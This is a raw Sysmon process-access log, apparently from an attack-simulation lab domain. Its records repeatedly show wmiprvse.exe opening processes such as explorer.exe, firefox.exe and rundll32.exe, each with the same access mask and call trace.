C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 